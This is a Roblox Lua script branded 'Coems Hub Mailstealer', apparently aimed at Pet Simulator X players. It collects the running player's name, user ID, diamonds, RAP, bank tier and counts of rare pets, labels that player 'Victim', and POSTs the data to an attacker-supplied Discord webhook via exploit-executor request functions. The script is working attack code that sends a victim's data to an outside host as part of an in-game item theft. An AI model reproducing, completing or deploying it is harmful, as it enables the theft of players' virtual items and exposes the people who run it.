
local Exclusive = 0

for i,v in pairs(game:GetService("Players").LocalPlayer.PlayerGui.Mailbox.Frame.GiftPet.Container.Inventory.Pets:GetChildren()) do
    if v:IsA("TextButton") then
    	if v:FindFirstChild("RarityGradient"):FindFirstChild("Exclusive") then
                    Exclusive = Exclusive + 1
                end
            end
	end

local Event = 0

for i,v in pairs(game:GetService("Players").LocalPlayer.PlayerGui.Mailbox.Frame.GiftPet.Container.Inventory.Pets:GetChildren()) do
    if v:IsA("TextButton") then
    	if v:FindFirstChild("RarityGradient"):FindFirstChild("Event") then
                    Event = Event + 1
                end
            end
	end

_G.CurrentRank = game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Rank.RankName.Text
_G.PlrUserVictim = game.Players.LocalPlayer.Name
_G.PlrUserIDVictim = game.Players.LocalPlayer.UserId
_G.PlrDisplayNameVictim = game.Players.LocalPlayer.DisplayName
_G.DisplayDiamond = game:GetService("Players").LocalPlayer.leaderstats.Diamonds.Value
_G.DisplayRap = game:GetService("Players").LocalPlayer.leaderstats.RAP.Value
_G.DisplayBankTier = game:GetService("Players").LocalPlayer.PlayerGui.Bank.Frame.BankTitle.Tier.Text
local GemsFormated = (require(game:GetService("ReplicatedStorage").Library.Functions.NumberShorten)( _G.DisplayDiamond ))
local RapFormated = (require(game:GetService("ReplicatedStorage").Library.Functions.NumberShorten)( _G.DisplayRap ))
local webhookcolor = ""

local function sendwebhook(msg)
local msg = {
	["avatar_url"] = "https://cdn.discordapp.com/icons/1109197661652910210/c635dd13f1317b77ded3c73a19840db2.png",
	["content"]= "**Sending Items**",
	["username"] = "Coems Hub Mailstealer",
	["embeds"]= {
	  {
		["title"]= "***:e_mail:🤑 Coems Hub Mailstealer:e_mail:***",
		["description"]= "**Sending Items**",
		["url"]= "https://discord.gg/scripter",
		["color"]= ""..webhookcolor.."",
		["thumbnail"] = {
        ["url"] = "https://cdn.discordapp.com/icons/1109197661652910210/c635dd13f1317b77ded3c73a19840db2.png",
        ["height"] = 420,
        ["width"] = 420
        },
        ["fields"]= {
            {
              ["name"]= "**<:diamond_psx:1118474311615918080>Diamonds<:diamond_psx:1118474311615918080>**",
              ["value"]= "```"..GemsFormated.."```",
              ["inline"]= true
            },
            {
              ["name"]= "**<:huge_cat:1118474511763906660>Exclusive<:huge_cat:1118474511763906660>**",
              ["value"]= "```"..Exclusive.."```",
              ["inline"]= true
            },
            {
              ["name"]= "**<:event:1112767158049591307>Event<:event:1112767158049591307>**",
              ["value"]= "```"..Event.."```",
              ["inline"]= true
            }
          }
  }
  },
	["attachments"] = {}
  }
  local Webhook = _G.Webhook
  request = http_request or request or HttpPost or syn.request
  request({Url = Webhook, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = game.HttpService:JSONEncode(msg)})
  end
  sendwebhook(msg)
